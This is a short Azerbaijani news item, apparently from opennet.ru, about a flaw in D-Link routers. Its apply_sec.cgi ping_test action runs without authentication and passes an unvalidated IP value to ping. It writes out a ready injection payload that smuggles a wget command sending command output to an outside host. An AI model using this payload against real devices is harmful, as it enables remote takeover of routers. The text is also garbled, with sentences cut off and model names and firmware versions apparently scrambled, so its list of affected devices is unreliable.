D-Link simsiz marşrutlaşdırıcılarında
Maraqlıdır ki, proqram təminatı tərtibatçılarının fikrincə, “ping_test” çağırışı yalnız autentifikasiyadan sonra yerinə yetirilməlidir, lakin əslində o, veb interfeysinə daxil olmaqdan asılı olmayaraq istənilən halda çağırılır. Xüsusilə, apply_sec.cgi skriptinə daxil olduqda və “action=ping_test” parametrini keçərkən, skript autentifikasiya səhifəsinə yönləndirir, lakin eyni zamanda ping_test ilə əlaqəli hərəkəti yerinə yetirir. Kodu icra etmək üçün ping_test-in özündə başqa bir boşluqdan istifadə edilib, o, sınaq üçün göndərilmiş IP ünvanının düzgünlüyünü düzgün yoxlamadan ping yardım proqramını çağırır. Məsələn, wget yardım proqramına zəng etmək və “echo 1234” əmrinin nəticələrini xarici hosta köçürmək üçün “ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http://” parametrini göstərmək kifayətdir. test.test/?$( echo 1234)".
Zəifliyin mövcudluğu aşağıdakı modellərdə rəsmi olaraq təsdiqlənib:
- 655b3.02 və ya daha köhnə proqram təminatı ilə DIR-05;
- 866b1.03 və ya daha köhnə proqram təminatı ilə DIR-04L;
- 1565 və ya daha köhnə proqram təminatı ilə DIR-1.01;
- DIR-652 (problemli proqram təminatı versiyaları haqqında məlumat verilmir)
Bu modellər üçün dəstək müddəti artıq başa çatıb, ona görə də D-Link
Sonradan məlum oldu ki, zəiflik də var
Mənbə: opennet.ru